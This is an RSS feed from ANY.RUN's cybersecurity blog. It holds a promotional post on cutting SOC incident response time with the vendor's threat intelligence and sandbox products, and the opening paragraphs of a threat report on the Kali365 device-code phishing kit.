<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>ANY.RUN RSS feed</title>
	<atom:link href="https://any.run/cybersecurity-blog/feed/" rel="self" type="application/rss+xml"/>
	<link/>
	<description>The latest posts and cybersecurity news</description>
	<lastBuildDate>Thu, 23 Jul 2026 17:56:25 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/cropped-Favicon_WebSite_Rounded-32x32.png</url>
	<title>ANY.RUN's Cybersecurity Blog</title>
	<link/>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Faster Incident Response: How ANY.RUN Helps SOCs Cut MTTR by Up to 21 Minutes per Case</title>
		<link>https://any.run/cybersecurity-blog/efficient-soc-for-fast-response/</link>
					<comments>https://any.run/cybersecurity-blog/efficient-soc-for-fast-response/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 22 Jul 2026 11:44:40 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">/cybersecurity-blog/?p=15857</guid>

					<description><![CDATA[<p>SOCs face constant pressure to detect and respond to threats faster. Heavy workloads, limited threat visibility, and disconnected tools can delay action, increasing the risk of&#160;financial loss&#160;and operational disruption.&#160; ANY.RUN helps more than 15,000 security teams reduce these delays with fresh threat intelligence, interactive analysis, contextual enrichment, and analyst-curated reporting.  Here’s&#160;how your SOC can handle incidents more [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/efficient-soc-for-fast-response/">Faster Incident Response: How ANY.RUN Helps SOCs Cut MTTR by Up to 21 Minutes per Case</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">SOCs face constant pressure to detect and respond to threats faster. Heavy workloads, limited threat visibility, and disconnected tools can delay action, increasing the risk of&nbsp;financial loss&nbsp;and operational disruption.&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN helps more than 15,000 security teams reduce these delays with fresh threat intelligence, interactive analysis, contextual enrichment, and analyst-curated reporting. </p>



<p class="wp-block-paragraph">Here’s&nbsp;how your SOC can handle incidents more efficiently and save up to 21 minutes per case.&nbsp;</p>



<h2 class="wp-block-heading">Detect Emerging Threats&nbsp;Earlier&nbsp;with TI Feeds&nbsp;</h2>



<p class="wp-block-paragraph">When threat intelligence arrives too late, SOC teams may only&nbsp;identify&nbsp;malicious activity after it has already reached their environment. ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;continuously&nbsp;deliver&nbsp;machine-readable IOCs collected from recent, real-world attacks, helping organizations detect emerging threats within 24 hours of their appearance.&nbsp;</p>



<p class="wp-block-paragraph">Each IP address, domain, URL, and file hash comes with context showing why it is malicious and how it was&nbsp;observed. Through ready-made connectors, APIs, and STIX/TAXII support, teams can send this intelligence directly to SIEMs, TIPs, SOAR platforms, firewalls, and other security systems.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img fetchpriority="high" decoding="async" width="1024" height="454" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-1024x454.png" alt="" class="wp-image-22232" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-1024x454.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-300x133.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-768x341.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-1536x681.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-2048x908.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-370x164.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-270x120.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-740x328.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds providing fresh, actionable IOCs right into your existing security systems</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">This allows detection rules and monitoring workflows to be updated continuously as new threats&nbsp;emerge, without requiring analysts to research and prepare every indicator manually.&nbsp;</p>



<p class="wp-block-paragraph">As a result, SOC teams can:&nbsp;</p>



<ul class="wp-block-list">
<li>Detect emerging threats within 24 hours of their appearance </li>



<li>Continuously strengthen detection coverage with fresh IOCs </li>



<li>Reduce the time spent validating and enriching indicators </li>



<li>Update security systems without adding more manual work </li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Detect Emerging Threats Before They Escalate. </span><br>Strengthen detection coverage with fresh, context-rich IOCs.&nbsp;  
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Strengthen Threat Detection
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Speed Up File- and URL-Based Threat Triage&nbsp;</h2>



<p class="wp-block-paragraph">Suspicious files and URLs can slow triage when analysts must reproduce user actions, inspect several data sources, and manually piece together the attack chain. ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> brings this work into one browser-based environment, helping teams quickly determine whether an alert is malicious and what response is required.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-1024x570.png" alt="" class="wp-image-22230" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-1024x570.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-1536x854.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-2048x1139.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-740x412.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing attack analyzed inside ANY.RUN sandbox</em></figcaption></figure>



<p class="wp-block-paragraph">Analysts can interact directly with files, links, phishing pages, and applications to reveal hidden&nbsp;behavior.&nbsp;<a href="https://any.run/cybersecurity-blog/automated-interactivity-stage-two/" target="_blank" rel="noreferrer noopener">Automated Interactivity</a>&nbsp;performs repetitive actions such as opening attachments, following links, and launching payloads, allowing threats to expose themselves without adding more manual work for the SOC.&nbsp;</p>



<p class="wp-block-paragraph">Verdicts, process activity, network connections, IOCs, TTPs, screenshots, and&nbsp;behavioral&nbsp;evidence are available in one investigation view.&nbsp;<a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener">Ready-made Tier 1 reports</a>&nbsp;give analysts the context needed to&nbsp;validate&nbsp;alerts, prioritize incidents, and begin containment without escalating every case.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-1024x586.png" alt="" class="wp-image-22259" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-2048x1172.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-270x154.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.25.42-740x423.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Tier 1 Reports with AI summary and recommendations</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Sandbox session&nbsp;links and downloadable reports also make it easier to share evidence, request a second opinion, and avoid repeating the same analysis across the team.&nbsp;</p>



<p class="wp-block-paragraph">As a result, SOC teams can:&nbsp;</p>



<ul class="wp-block-list">
<li>Accelerate alert triage, with 94% of users reporting faster results </li>



<li>Reduce Tier 1 workload by up to 20% </li>



<li>Reach containment decisions with greater confidence </li>



<li>Reduce alert fatigue with immediate behavioral evidence </li>
</ul>



<h2 class="wp-block-heading">Expand Threat Context for Faster Investigations&nbsp;</h2>



<p class="wp-block-paragraph">Threat intelligence shortens investigations by showing what sits behind an isolated alert: the malware involved, related infrastructure, campaign&nbsp;behavior, targeted industries, geographic activity, and techniques&nbsp;observed&nbsp;in recent attacks.&nbsp;</p>



<p class="wp-block-paragraph">This wider view allows organizations to&nbsp;determine&nbsp;whether the activity is relevant to their environment, estimate potential exposure, and focus SOC resources on the most urgent incidents.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-1024x586.png" alt="" class="wp-image-22153" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-2048x1172.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-270x155.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-740x423.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup allowing analysts to carry out deeper investigations</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;enriches IP addresses, domains, URLs, and file hashes with evidence collected from real-world investigations. Analysts can explore connected infrastructure, related files, network activity, malware&nbsp;behavior, and other indicators without searching across several external sources.&nbsp;</p>



<p class="wp-block-paragraph">This gives teams a clearer understanding of how the threat&nbsp;operates, how widely the activity may extend, and which assets or users may require further investigation.&nbsp;</p>



<p class="wp-block-paragraph">For deeper analysis, TI&nbsp;<a href="https://any.run/cybersecurity-blog/yara-rules-explained/" target="_blank" rel="noreferrer noopener">YARA Search</a>&nbsp;allows threat hunting and detection engineering teams to find samples that share specific code patterns or malware characteristics. These findings can reveal related activity and support new or improved detection rules against similar attacks.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="314" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-1024x314.png" alt="" class="wp-image-22254" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-1024x314.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-300x92.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-768x236.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-1536x471.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-2048x628.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-370x113.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-270x83.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.05.57-740x227.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI YARA Search for effective threat hunting and detection engineering</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Together, TI Lookup and TI YARA Search reduce repetitive research, expand the available evidence, and help teams investigate threats more thoroughly without delaying action.&nbsp;</p>



<p class="wp-block-paragraph">As a result, security leaders can:&nbsp;</p>



<ul class="wp-block-list">
<li>Focus SOC resources on threats relevant to their industry, region, and environment </li>



<li>Reduce investigation time without increasing analyst workload </li>



<li>Gain clearer visibility into potential exposure and connected attack activity </li>



<li>Improve detection coverage against related and recurring threats </li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce Triage Time. Ease Tier 1 Workload. </span><br>Give analysts the evidence to reach containment decisions faster.&nbsp;  
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Speed Up Threat Triage
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Turn Analyst-Curated Research into Action&nbsp;</h2>



<p class="wp-block-paragraph">Researching an active malware or phishing campaign can take hours. TI teams must collect indicators, connect them to related infrastructure, examine attacker&nbsp;behavior, and organize the findings before the intelligence can support detection and investigation.&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN analysts manually compile <a href="https://intelligence.any.run/reports?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">TI Reports</a> on malware and phishing attacks, with particular attention to APTs and cybercriminal groups. Each report brings together the key details teams need to understand the threat, including campaign behavior, malicious infrastructure, IOCs, TTPs, and other evidence collected from real-world investigations.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="573" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-1024x573.png" alt="" class="wp-image-22255" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-1024x573.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-768x429.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-1536x859.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-2048x1145.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-370x207.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.08.34-740x414.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Reports also&nbsp;contain&nbsp;ready-made TI Lookup queries that teams can use to enrich investigations and explore related activity without building searches from scratch. Relevant IOCs can then be added to SIEMs, TIPs, EDRs, firewalls, and other detection systems to strengthen coverage against the threat.&nbsp;</p>



<p class="wp-block-paragraph">This reduces the amount of manual research&nbsp;required&nbsp;from internal TI teams and shortens the path from learning about an attack to updating detection and investigation workflows.&nbsp;</p>



<p class="wp-block-paragraph">As a result, organizations can:&nbsp;</p>



<ul class="wp-block-list">
<li>Reduce the time required to research complex campaigns </li>



<li>Gain deeper visibility into APT and cybercriminal activity </li>



<li>Give SOC and TI teams a clear starting point for investigations </li>



<li>Free internal specialists to focus on organization-specific risks </li>



<li>Turn expert threat research into stronger detections sooner </li>
</ul>



<h2 class="wp-block-heading">The Result: 21 Minutes Faster MTTR per Case&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN helps security teams remove delays across detection, triage, investigation, and threat response. By bringing&nbsp;behavioral&nbsp;evidence, current threat intelligence, automation, and integrations into one connected workflow, organizations can reduce MTTR by up to 21 minutes per incident.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="485" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1024x485.png" alt="" class="wp-image-22257" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1024x485.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-768x363.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1536x727.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-2048x969.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-740x350.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN helps teams achieve better results in SOC processes</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This translates to:&nbsp;</p>



<ul class="wp-block-list">
<li>More threats handled with existing SOC resources </li>



<li>Faster alert validation and investigation </li>



<li>Higher detection rates and wider threat coverage </li>



<li>Fewer unnecessary escalations to senior analysts </li>



<li>Shorter exposure windows and quicker containment decisions </li>
</ul>



<p class="wp-block-paragraph">Organizations across different industries are already seeing these results.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">Expertware&nbsp;reduced malware investigation and IOC extraction turnaround time&nbsp;<a href="https://any.run/cybersecurity-blog/expertware-success-story/" target="_blank" rel="noreferrer noopener">by more than 50%</a>.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">UMass Boston&nbsp;<a href="https://any.run/cybersecurity-blog/umass-boston-success-story/" target="_blank" rel="noreferrer noopener">shortened investigations from minutes to seconds</a>&nbsp;and increased alert-processing capacity without adding headcount.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">A US automotive manufacturer doubled triage speed,&nbsp;<a href="https://any.run/cybersecurity-blog/us-manufacturer-security-risk/" target="_blank" rel="noreferrer noopener">reached a 20-second MTTD</a>, and began&nbsp;analyzing&nbsp;hundreds of supplier files each week without expanding its team.&nbsp;</p>



<p class="wp-block-paragraph">These examples show how ANY.RUN helps security teams shorten the path from alert to containment, make response decisions faster, and reduce the risk of incidents escalating into wider business disruption.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut MTTR. Reduce Business Risk. </span><br>Help your SOC detect, investigate, and contain threats faster&nbsp;  
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=faster-incident-response&#038;utm_term=220726&#038;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Accelerate Incident Response
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps organizations investigate threats faster&nbsp;andmake&nbsp;response decisions based on clear&nbsp;behavioral&nbsp;evidence.&nbsp;</p>



<p class="wp-block-paragraph">Its solutions include the&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;for enterprise-scale malware and phishing analysis, along with&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>&nbsp;products built on&nbsp;investigationdata&nbsp;from more than 15,000 organizations. This intelligence helps security teams enrich alerts, uncover active threats earlier, and add relevant context to detection, investigation, and response workflows.&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=faster-incident-response&amp;utm_term=220726&amp;utm_content=linktocomliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>,&nbsp;demonstrating&nbsp;its commitment to strong security controls and customer data protection. For SOCs, MSSPs, and enterprise security teams, the platform helps reduce investigation uncertainty, accelerate triage, and turn threat analysis into actionable findings.&nbsp;</p>
<p>The post <a href="https://any.run/cybersecurity-blog/efficient-soc-for-fast-response/">Faster Incident Response: How ANY.RUN Helps SOCs Cut MTTR by Up to 21 Minutes per Case</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/efficient-soc-for-fast-response/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kali365 Targets US Organizations with Data Theft via Device Code Phishing </title>
		<link>https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/</link>
					<comments>https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/#respond</comments>
		
		<dc:creator><![CDATA[GridGuardGhoul]]></dc:creator>
		<pubDate>Tue, 21 Jul 2026 07:01:11 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22219</guid>

					<description><![CDATA[<p>Kali365 is&#160;targeting US&#160;organizations&#160;with device code phishing attacks&#160;that abuse legitimate Microsoft authentication. Instead of directing victims&#160;to a fake login form, the&#160;phishkit&#160;sends&#160;them to a real Microsoft page, where they authorize access&#160;using an attacker-controlled device code.&#160; This&#160;makes&#160;the attack harder for analysts&#160;to&#160;spot and more dangerous&#160;for the business. By obtaining OAuth access&#160;and refresh tokens, attackers&#160;may gain continued access&#160;to Microsoft 365 [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/">Kali365 Targets US Organizations with Data Theft via Device Code Phishing </a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Kali365 is&nbsp;targeting US&nbsp;organizations&nbsp;with device code phishing attacks&nbsp;that abuse legitimate Microsoft authentication. Instead of directing victims&nbsp;to a fake login form, the&nbsp;phishkit&nbsp;sends&nbsp;them to a real Microsoft page, where they authorize access&nbsp;using an attacker-controlled device code.&nbsp;</p>



<p class="wp-block-paragraph">This&nbsp;makes&nbsp;the attack harder for analysts&nbsp;to&nbsp;spot and more dangerous&nbsp;for the business. By obtaining OAuth access&nbsp;and refresh tokens, attackers&nbsp;may gain continued access&nbsp;to Microsoft 365 accounts, corporate email, documents, and cloud resources&nbsp;without&nbsp;stealing the victim’s&nbsp;password directly.&nbsp;</p>



<h2 class="wp-block-heading">Kali365 Attack Overview&nbsp;</h2>



<p class="wp-block-paragraph">Kali365 is&nbsp;a phishing kit that uses&nbsp;the Device Code Phishing technique. These attacks&nbsp;abuse Microsoft’s&nbsp;legitimate device authentication process: the victim isshown&nbsp;a user code and persuaded to enter it on the authentic Microsoft Device Login page.&nbsp;</p>



